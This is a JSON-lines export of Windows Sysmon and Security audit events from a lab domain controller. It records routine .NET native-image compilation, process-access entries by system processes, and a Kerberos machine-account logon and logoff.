{"EventTime":"2020-08-01 05:58:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7344,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:58.762\r\nProcessGuid: {A837DB8D-04A1-5F25-0000-00105B9C0F00}\r\nProcessId: 4428\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\114c-0\\System.Activities.Core.Presentation.dll\r\nCreationUtcTime: 2020-08-01 05:58:58.762","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:58.762","ProcessGuid":"{A837DB8D-04A1-5F25-0000-00105B9C0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\114c-0\\System.Activities.Core.Presentation.dll","CreationUtcTime":"2020-08-01 05:58:58.762","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7345,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:58.824\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A2-5F25-0000-00108EAD0F00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:58.824","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A2-5F25-0000-00108EAD0F00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7346,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:58.824\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A2-5F25-0000-00108EAD0F00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:58.824","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A2-5F25-0000-00108EAD0F00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7347,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:58.824\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A2-5F25-0000-00108EAD0F00}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:58.824","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A2-5F25-0000-00108EAD0F00}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7348,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:58.918\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-00101ADD0E00}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:58.918","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00101ADD0E00}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7349,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:58.918\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-00101ADD0E00}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:58.918","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00101ADD0E00}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7350,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:58.918\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-00101ADD0E00}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:58.918","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00101ADD0E00}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220717,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xFB491\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xfb491","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220718,"ProcessID":864,"ThreadID":1544,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xFB491\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t55043\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xfb491","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"55043","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220719,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xFB491\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xfb491","LogonType":"3","EventReceivedTime":"2020-08-01 05:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
